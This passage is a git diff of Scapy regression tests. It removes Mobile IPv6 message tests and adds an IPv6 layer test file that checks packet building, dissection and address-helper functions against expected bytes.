\x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x01\x02w\x88\x99\x00\x00\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa') -b=a.payload -a.nh == 135 and isinstance(b, MIP6MH_CoTI) and b.nh==59 and b.mhtype == 2 and b.len == 1 and b.res == 0x77 and b.cksum == 0x8899 and b.cookie == b'\xAA'*8 - - -############ -############ -+ Home Test Message - -= MIP6MH_HoT - Build (default values) -raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/MIP6MH_HoT()) == b'`\x00\x00\x00\x00\x18\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x02\x03\x00e\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= MIP6MH_HoT - Dissection (default values) -a=IPv6(b'`\x00\x00\x00\x00\x18\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x02\x03\x00e\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -b = a.payload -a.nh == 135 and isinstance(b, MIP6MH_HoT) and b.nh==59 and b.mhtype == 3 and b.len== 2 and b.res == 0 and b.cksum == 0x65e9 and b.index == 0 and b.cookie == b'\x00'*8 and b.token == b'\x00'*8 - -= MIP6MH_HoT - Build (specific values) -raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/MIP6MH_HoT(res=0x77, cksum=0x8899, cookie=b"\xAA"*8, index=0xAABB, token=b'\xCC'*8)) == b'`\x00\x00\x00\x00\x18\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x02\x03w\x88\x99\xaa\xbb\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc' - -= MIP6MH_HoT - Dissection (specific values) -a=IPv6(b'`\x00\x00\x00\x00\x18\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x02\x03w\x88\x99\xaa\xbb\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc') -b = a.payload -a.nh == 135 and isinstance(b, MIP6MH_HoT) and b.nh==59 and b.mhtype == 3 and b.len== 2 and b.res == 0x77 and b.cksum == 0x8899 and b.index == 0xAABB and b.cookie == b'\xAA'*8 and b.token == b'\xCC'*8 - -= MIP6MH_HoT answers -a1, a2 = "2001:db8::1", "2001:db8::2" -cookie = RandString(8)._fix() -p1 = IPv6(src=a1, dst=a2)/MIP6MH_HoTI(cookie=cookie) -p2 = IPv6(src=a2, dst=a1)/MIP6MH_HoT(cookie=cookie) -p2_ko = IPv6(src=a2, dst=a1)/MIP6MH_HoT(cookie="".join(chr((orb(b'\xff') + 1) % 256))) -assert p1.hashret() == p2.hashret() and p2.answers(p1) and not p1.answers(p2) -assert p1.hashret() != p2_ko.hashret() and not p2_ko.answers(p1) and not p1.answers(p2_ko) - - -############ -############ -+ Care-of Test Message - -= MIP6MH_CoT - Build (default values) -raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/MIP6MH_CoT()) == b'`\x00\x00\x00\x00\x18\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x02\x04\x00d\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= MIP6MH_CoT - Dissection (default values) -a=IPv6(b'`\x00\x00\x00\x00\x18\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x02\x04\x00d\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -b = a.payload -a.nh == 135 and isinstance(b, MIP6MH_HoT) and b.nh==59 and b.mhtype == 4 and b.len== 2 and b.res == 0 and b.cksum == 0x64e9 and b.index == 0 and b.cookie == b'\x00'*8 and b.token == b'\x00'*8 - -= MIP6MH_CoT - Build (specific values) -raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/MIP6MH_CoT(res=0x77, cksum=0x8899, cookie=b"\xAA"*8, index=0xAABB, token=b'\xCC'*8)) == b'`\x00\x00\x00\x00\x18\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x02\x04w\x88\x99\xaa\xbb\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc' - -= MIP6MH_CoT - Dissection (specific values) -a=IPv6(b'`\x00\x00\x00\x00\x18\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x02\x04w\x88\x99\xaa\xbb\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc') -b = a.payload -a.nh == 135 and isinstance(b, MIP6MH_CoT) and b.nh==59 and b.mhtype == 4 and b.len== 2 and b.res == 0x77 and b.cksum == 0x8899 and b.index == 0xAABB and b.cookie == b'\xAA'*8 and b.token == b'\xCC'*8 - - -############ -############ -+ Binding Update Message - -= MIP6MH_BU - build (default values) -s= b'`\x00\x00\x00\x00(<@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x87\x02\x01\x02\x00\x00\xc9\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;\x01\x05\x00\xee`\x00\x00\xd0\x00\x00\x03\x01\x02\x00\x00' -raw(IPv6()/IPv6ExtHdrDestOpt(options=[HAO()])/MIP6MH_BU()) == s - -= MIP6MH_BU - dissection (default values) -p = IPv6(s) -p[MIP6MH_BU].len == 1 - -= MIP6MH_BU - build -s = b'`\x00\x00\x00\x00P<@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x87\x02\x01\x02\x00\x00\xc9\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe;\x06\x05\x00\xea\xf2\x00\x00\xd0\x00\x00*\x01\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00\x06\x12\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -raw(IPv6()/IPv6ExtHdrDestOpt(options=[HAO(hoa='2001:db8::cafe')])/MIP6MH_BU(mhtime=42, options=[MIP6OptAltCoA(),MIP6OptMobNetPrefix()])) == s - -= MIP6MH_BU - dissection -p = IPv6(s) -p[MIP6MH_BU].cksum == 0xeaf2 and p[MIP6MH_BU].len == 6 and len(p[MIP6MH_BU].options) == 4 and p[MIP6MH_BU].mhtime == 42 - - -############ -############ -+ Binding ACK Message - -= MIP6MH_BA - build -s = b'`\x00\x00\x00\x00\x10\x87@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01;\x01\x06\x00\xbc\xb9\x00\x80\x00\x00\x00*\x01\x02\x00\x00' -raw(IPv6()/MIP6MH_BA(mhtime=42)) == s - -= MIP6MH_BA - dissection -p = IPv6(s) -p[MIP6MH_BA].cksum == 0xbcb9 and p[MIP6MH_BA].len == 1 and len(p[MIP6MH_BA].options) == 1 and p[MIP6MH_BA].mhtime == 42 - - -############ -############ -+ Binding ERR Message - -= MIP6MH_BE - build -s = b'`\x00\x00\x00\x00\x18\x87@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01;\x02\x07\x00\xbbY\x02\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02' -raw(IPv6()/MIP6MH_BE(status=2, ha='1::2')) == s - -= MIP6MH_BE - dissection -p = IPv6(s) -p[MIP6MH_BE].cksum=0xba10 and p[MIP6MH_BE].len == 1 and len(p[MIP6MH_BE].options) == 1 - ############ ############ diff --git a/test/scapy/layers/inet6.uts b/test/scapy/layers/inet6.uts new file mode 100644 index 00000000000..f931545ff3b --- /dev/null +++ b/test/scapy/layers/inet6.uts @@ -0,0 +1,2867 @@ +% Scapy IPv6 layers tests + +# Scapy6 Regression Test Campaign + +############ +############ ++ Test IPv6 Class += IPv6 Class basic Instantiation +a=IPv6() + += IPv6 Class basic build (default values) +raw(IPv6()) == b'`\x00\x00\x00\x00\x00;@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' + += IPv6 Class basic dissection (default values) +a=IPv6(raw(IPv6())) +a.version == 6 and a.tc == 0 and a.fl == 0 and a.plen == 0 and a.nh == 59 and a.hlim ==64 and a.src == "::1" and a.dst == "::1" + += IPv6 Class with basic TCP stacked - build +raw(IPv6()/TCP()) == b'`\x00\x00\x00\x00\x14\x06@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x8f}\x00\x00' + += IPv6 Class with basic TCP stacked - dissection +a=IPv6(raw(IPv6()/TCP())) +a.nh == 6 and a.plen == 20 and isinstance(a.payload, TCP) and a.payload.chksum == 0x8f7d + += IPv6 Class with TCP and TCP data - build +raw(IPv6()/TCP()/Raw(load="somedata")) == b'`\x00\x00\x00\x00\x1c\x06@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\xd5\xdd\x00\x00somedata' + += IPv6 Class with TCP and TCP data - dissection +a=IPv6(raw(IPv6()/TCP(dport=1234, sport=1234)/Raw(load="somedata"))) +a.nh == 6 and a.plen == 28 and isinstance(a.payload, TCP) and a.payload.chksum == 0xcc9d and isinstance(a.payload.payload, Raw) and a[Raw].load == b"somedata" + += IPv6 Class binding with Ethernet - build +raw(Ether(src="00:00:00:00:00:00", dst="ff:ff:ff:ff:ff:ff")/IPv6()/TCP()) == b'\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x86\xdd`\x00\x00\x00\x00\x14\x06@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x8f}\x00\x00' + += IPv6 Class binding with Ethernet - dissection +a=Ether(raw(Ether()/IPv6()/TCP())) +a.type == 0x86dd + += IPv6 Class - summary +a = Ether(src="aa:aa:aa:aa:aa:aa", dst="bb:bb:bb:bb:bb:bb")/IPv6(src='c266:a92d:0ed8:dc54:7d6f:9667:3743:a32f', dst='6406:c31f:d0b5:72fc:1700:2081:62e7:fae9') +assert a.summary() == 'Ether / c266:a92d:ed8:dc54:7d6f:9667:3743:a32f > 6406:c31f:d0b5:72fc:1700:2081:62e7:fae9 (59)' + += IPv6 Class binding with GRE - build +s = raw(IP(src="127.0.0.1")/GRE()/Ether(dst="ff:ff:ff:ff:ff:ff", src="00:00:00:00:00:00")/IP()/GRE()/IPv6(src="::1")) +s == b'E\x00\x00f\x00\x01\x00\x00@/|f\x7f\x00\x00\x01\x7f\x00\x00\x01\x00\x00eX\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x08\x00E\x00\x00@\x00\x01\x00\x00@/|\x8c\x7f\x00\x00\x01\x7f\x00\x00\x01\x00\x00\x86\xdd`\x00\x00\x00\x00\x00;@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' + += IPv6 Class binding with GRE - dissection +p = IP(s) +GRE in p and p[GRE:1].proto == 0x6558 and p[GRE:2].proto == 0x86DD and IPv6 in p + += IPv6 ma_addr coverage on hashret +IPv6(dst="ff00::1:ff28:9c5a", src="::").hashret() == b';' + +########### IPv6ExtHdrRouting Class ########################### + += IPv6ExtHdrRouting Class - No address - build +raw(IPv6(src="2048::deca", dst="2047::cafe")/IPv6ExtHdrRouting(addresses=[])/TCP(dport=80)) ==b'`\x00\x00\x00\x00\x1c+@ H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca G\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x06\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\xa5&\x00\x00' + += IPv6ExtHdrRouting Class - One address - build +raw(IPv6(src="2048::deca", dst="2047::cafe")/IPv6ExtHdrRouting(addresses=["2022::deca"])/TCP(dport=80)) == b'`\x00\x00\x00\x00,+@ H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca G\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x06\x02\x00\x01\x00\x00\x00\x00 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x91\x7f\x00\x00' + += IPv6ExtHdrRouting Class - Multiple Addresses - build +raw(IPv6(src="2048::deca", dst="2047::cafe")/IPv6ExtHdrRouting(addresses=["2001::deca", "2022::deca"])/TCP(dport=80)) == b'`\x00\x00\x00\x00<+@ H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca G\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x06\x04\x00\x02\x00\x00\x00\x00 \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x91\x7f\x00\x00' + += IPv6ExtHdrRouting Class - Specific segleft (2->1) - build +raw(IPv6(src="2048::deca", dst="2047::cafe")/IPv6ExtHdrRouting(addresses=["2001::deca", "2022::deca"], segleft=1)/TCP(dport=80)) == b'`\x00\x00\x00\x00<+@ H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca G\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x06\x04\x00\x01\x00\x00\x00\x00 \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x91\x7f\x00\x00' + += IPv6ExtHdrRouting Class - Specific segleft (2->0) - build +raw(IPv6(src="2048::deca", dst="2047::cafe")/IPv6ExtHdrRouting(addresses=["2001::deca", "2022::deca"], segleft=0)/TCP(dport=80)) == b'`\x00\x00\x00\x00<+@ H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca G\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x06\x04\x00\x00\x00\x00\x00\x00 \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\xa5&\x00\x00' + +########### IPv6ExtHdrSegmentRouting Class ########################### + += IPv6ExtHdrSegmentRouting Class - default - build & dissect +s = raw(IPv6()/IPv6ExtHdrSegmentRouting()/UDP()) +assert(s == b'`\x00\x00\x00\x00 +@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x11\x02\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x005\x005\x00\x08\xffr') + +p = IPv6(s) +assert(UDP in p and IPv6ExtHdrSegmentRouting in p) +assert(p[IPv6ExtHdrSegmentRouting].lastentry == 0 and len(p[IPv6ExtHdrSegmentRouting].addresses) == 1 and len(p[IPv6ExtHdrSegmentRouting].tlv_objects) == 0) + += IPv6ExtHdrSegmentRouting Class - addresses list - build & dissect + +s = raw(IPv6()/IPv6ExtHdrSegmentRouting(addresses=["::1", "::2", "::3"])/UDP()) +assert(s == b'`\x00\x00\x00\x00@+@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x11\x06\x04\x02\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x005\x005\x00\x08\xffr') + +p = IPv6(s) +assert(UDP in p and IPv6ExtHdrSegmentRouting in p) +assert(p[IPv6ExtHdrSegmentRouting].lastentry == 2 and len(p[IPv6ExtHdrSegmentRouting].addresses) == 3 and len(p[IPv6ExtHdrSegmentRouting].tlv_objects) == 0) + += IPv6ExtHdrSegmentRouting Class - TLVs list - build & dissect + +s = raw(IPv6()/IPv6ExtHdrSegmentRouting(tlv_objects=[IPv6ExtHdrSegmentRoutingTLV()])/TCP()) +assert(s == b'`\x00\x00\x00\x004+@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x06\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x04\x02\x00\x00\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x8f}\x00\x00') + +p = IPv6(s) +assert(TCP in p and IPv6ExtHdrSegmentRouting in p) +assert(p[IPv6ExtHdrSegmentRouting].lastentry == 0) +assert(len(p[IPv6ExtHdrSegmentRouting].addresses) == 1 and len(p[IPv6ExtHdrSegmentRouting].tlv_objects) == 2) +assert(isinstance(p[IPv6ExtHdrSegmentRouting].tlv_objects[1], IPv6ExtHdrSegmentRoutingTLVPadding)) + += IPv6ExtHdrSegmentRouting Class - both lists - build & dissect + +s = raw(IPv6()/IPv6ExtHdrSegmentRouting(addresses=["::1", "::2", "::3"], tlv_objects=[IPv6ExtHdrSegmentRoutingTLVIngressNode(),IPv6ExtHdrSegmentRoutingTLVEgressNode()])/ICMPv6EchoRequest()) +assert(s == b'`\x00\x00\x00\x00h+@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01:\x0b\x04\x02\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x01\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x80\x00\x7f\xbb\x00\x00\x00\x00') + +p = IPv6(s) +assert(p[IPv6ExtHdrSegmentRouting].lastentry == 2) +assert(ICMPv6EchoRequest in p and IPv6ExtHdrSegmentRouting in p) +assert(len(p[IPv6ExtHdrSegmentRouting].addresses) == 3 and len(p[IPv6ExtHdrSegmentRouting].tlv_objects) == 2) + += IPv6ExtHdrSegmentRouting Class - UDP pseudo-header checksum - build & dissect + +s= raw(IPv6(src="fc00::1", dst="fd00::42")/IPv6ExtHdrSegmentRouting(addresses=["fd00::42", "fc13::1337"][::-1], segleft=1, lastentry=1) / UDP(sport=11000, dport=4242) / Raw('foobar')) +assert(s == b'`\x00\x00\x00\x006+@\xfc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00B\x11\x04\x04\x01\x01\x00\x00\x00\xfc\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x137\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00B*\xf8\x10\x92\x00\x0e\x81\xb7foobar') + + +############ +############ ++ Test in6_get6to4Prefix() + += Test in6_get6to4Prefix() - 0.0.0.0 address +in6_get6to4Prefix("0.0.0.0") == "2002::" + += Test in6_get6to4Prefix() - 255.255.255.255 address +in6_get6to4Prefix("255.255.255.255") == "2002:ffff:ffff::" + += Test in6_get6to4Prefix() - 1.1.1.1 address +in6_get6to4Prefix("1.1.1.1") == "2002:101:101::" + += Test in6_get6to4Prefix() - invalid address +in6_get6to4Prefix("somebadrawing") is None + + +############ +############ ++ Test in6_6to4ExtractAddr() + += Test in6_6to4ExtractAddr() - 2002:: address +in6_6to4ExtractAddr("2002::") == "0.0.0.0" + += Test in6_6to4ExtractAddr() - 255.255.255.255 address +in6_6to4ExtractAddr("2002:ffff:ffff::") == "255.255.255.255" + += Test in6_6to4ExtractAddr() - "2002:101:101::" address +in6_6to4ExtractAddr("2002:101:101::") == "1.1.1.1" + += Test in6_6to4ExtractAddr() - invalid address +in6_6to4ExtractAddr("somebadrawing") is None + + +########### RFC 4489 - Link-Scoped IPv6 Multicast address ########### + += in6_getLinkScopedMcastAddr() : default generation +a = in6_getLinkScopedMcastAddr(addr="FE80::") +a == 'ff32:ff::' + += in6_getLinkScopedMcastAddr() : different valid scope values +a = in6_getLinkScopedMcastAddr(addr="FE80::", scope=0) +b = in6_getLinkScopedMcastAddr(addr="FE80::", scope=1) +c = in6_getLinkScopedMcastAddr(addr="FE80::", scope=2) +d = in6_getLinkScopedMcastAddr(addr="FE80::", scope=3) +a == 'ff30:ff::' and b == 'ff31:ff::' and c == 'ff32:ff::' and d is None + += in6_getLinkScopedMcastAddr() : grpid in different formats +a = in6_getLinkScopedMcastAddr(addr="FE80::A12:34FF:FE56:7890", grpid=b"\x12\x34\x56\x78") +b = in6_getLinkScopedMcastAddr(addr="FE80::A12:34FF:FE56:7890", grpid="12345678") +c = in6_getLinkScopedMcastAddr(addr="FE80::A12:34FF:FE56:7890", grpid=305419896) +a == b and b == c + + +########### ethernet address to iface ID conversion ################# + += in6_mactoifaceid() conversion function (test 1) +in6_mactoifaceid("FD:00:00:00:00:00", ulbit=0) == 'FD00:00FF:FE00:0000' + += in6_mactoifaceid() conversion function (test 2) +in6_mactoifaceid("FD:00:00:00:00:00", ulbit=1) == 'FF00:00FF:FE00:0000' + += in6_mactoifaceid() conversion function (test 3) +in6_mactoifaceid("FD:00:00:00:00:00") == 'FF00:00FF:FE00:0000' + += in6_mactoifaceid() conversion function (test 4) +in6_mactoifaceid("FF:00:00:00:00:00") == 'FD00:00FF:FE00:0000' + += in6_mactoifaceid() conversion function (test 5) +in6_mactoifaceid("FF:00:00:00:00:00", ulbit=1) == 'FF00:00FF:FE00:0000' + += in6_mactoifaceid() conversion function (test 6) +in6_mactoifaceid("FF:00:00:00:00:00", ulbit=0) == 'FD00:00FF:FE00:0000' + +########### iface ID conversion ################# + += in6_mactoifaceid() conversion function (test 1) +in6_ifaceidtomac(in6_mactoifaceid("FD:00:00:00:00:00", ulbit=0)) == 'ff:00:00:00:00:00' + += in6_mactoifaceid() conversion function (test 2) +in6_ifaceidtomac(in6_mactoifaceid("FD:00:00:00:00:00", ulbit=1)) == 'fd:00:00:00:00:00' + += in6_mactoifaceid() conversion function (test 3) +in6_ifaceidtomac(in6_mactoifaceid("FD:00:00:00:00:00")) == 'fd:00:00:00:00:00' + += in6_mactoifaceid() conversion function (test 4) +in6_ifaceidtomac(in6_mactoifaceid("FF:00:00:00:00:00")) == 'ff:00:00:00:00:00' + += in6_mactoifaceid() conversion function (test 5) +in6_ifaceidtomac(in6_mactoifaceid("FF:00:00:00:00:00", ulbit=1)) == 'fd:00:00:00:00:00' + += in6_mactoifaceid() conversion function (test 6) +in6_ifaceidtomac(in6_mactoifaceid("FF:00:00:00:00:00", ulbit=0)) == 'ff:00:00:00:00:00' + + += in6_addrtomac() conversion function (test 1) +in6_addrtomac("FE80::" + in6_mactoifaceid("FD:00:00:00:00:00", ulbit=0)) == 'ff:00:00:00:00:00' + += in6_addrtomac() conversion function (test 2) +in6_addrtomac("FE80::" + in6_mactoifaceid("FD:00:00:00:00:00", ulbit=1)) == 'fd:00:00:00:00:00' + += in6_addrtomac() conversion function (test 3) +in6_addrtomac("FE80::" + in6_mactoifaceid("FD:00:00:00:00:00")) == 'fd:00:00:00:00:00' + += in6_addrtomac() conversion function (test 4) +in6_addrtomac("FE80::" + in6_mactoifaceid("FF:00:00:00:00:00")) == 'ff:00:00:00:00:00' + += in6_addrtomac() conversion function (test 5) +in6_addrtomac("FE80::" + in6_mactoifaceid("FF:00:00:00:00:00", ulbit=1)) == 'fd:00:00:00:00:00' + += in6_addrtomac() conversion function (test 6) +in6_addrtomac("FE80::" + in6_mactoifaceid("FF:00:00:00:00:00", ulbit=0)) == 'ff:00:00:00:00:00' + +########### RFC 3041 related function ############################### += Test in6_getRandomizedIfaceId + +import socket + +for a in six.moves.range(10): + s1, s2 = in6_getRandomizedIfaceId('20b:93ff:feeb:2d3') + s1, s2 + tmp = inet_pton(socket.AF_INET6, "::" + s1)[8:] + tmp + assert (orb(tmp[0]) & 0x04) == 0 + s1, s2 = in6_getRandomizedIfaceId('20b:93ff:feeb:2d3', previous=s2) + s1, s2 + tmp = inet_pton(socket.AF_INET6, "::" + s1)[8:] + assert (orb(tmp[0]) & 0x04) == 0 + +assert in6_getRandomizedIfaceId('20b:93ff:feeb:2d3', previous='d006:d540:db11:b092') == ('721f:11fa:3743:fc7f', '5946:5272:7fcc:108a') + +########### RFC 1924 related function ############################### += Test RFC 1924 function - in6_ctop() basic test +in6_ctop("4)+k&C#VzJ4br>0wv%Yp") == '1080::8:800:200c:417a' + += Test RFC 1924 function - in6_ctop() with character outside charset +in6_ctop("4)+k&C#VzJ4br>0wv%Y'") == None + += Test RFC 1924 function - in6_ctop() with bad length address +in6_ctop("4)+k&C#VzJ4br>0wv%Y") == None + += Test RFC 1924 function - in6_ptoc() basic test +in6_ptoc('1080::8:800:200c:417a') == '4)+k&C#VzJ4br>0wv%Yp' + += Test RFC 1924 function - in6_ptoc() basic test +in6_ptoc('1080::8:800:200c:417a') == '4)+k&C#VzJ4br>0wv%Yp' + += Test RFC 1924 function - in6_ptoc() with bad input +in6_ptoc('1080:::8:800:200c:417a') == None + +########### in6_getAddrType ######################################### + += in6_getAddrType - 6to4 addresses +in6_getAddrType("2002::1") == (IPV6_ADDR_UNICAST | IPV6_ADDR_GLOBAL | IPV6_ADDR_6TO4) + += in6_getAddrType - Assignable Unicast global address +in6_getAddrType("2001:db8::1") == (IPV6_ADDR_UNICAST | IPV6_ADDR_GLOBAL) + += in6_getAddrType - Multicast global address +in6_getAddrType("FF0E::1") == (IPV6_ADDR_GLOBAL | IPV6_ADDR_MULTICAST) + += in6_getAddrType - Multicast local address +in6_getAddrType("FF02::1") == (IPV6_ADDR_LINKLOCAL | IPV6_ADDR_MULTICAST) + += in6_getAddrType - Unicast Link-Local address +in6_getAddrType("FE80::") == (IPV6_ADDR_UNICAST | IPV6_ADDR_LINKLOCAL) + += in6_getAddrType - Loopback address +in6_getAddrType("::1") == IPV6_ADDR_LOOPBACK + += in6_getAddrType - Unspecified address +in6_getAddrType("::") == 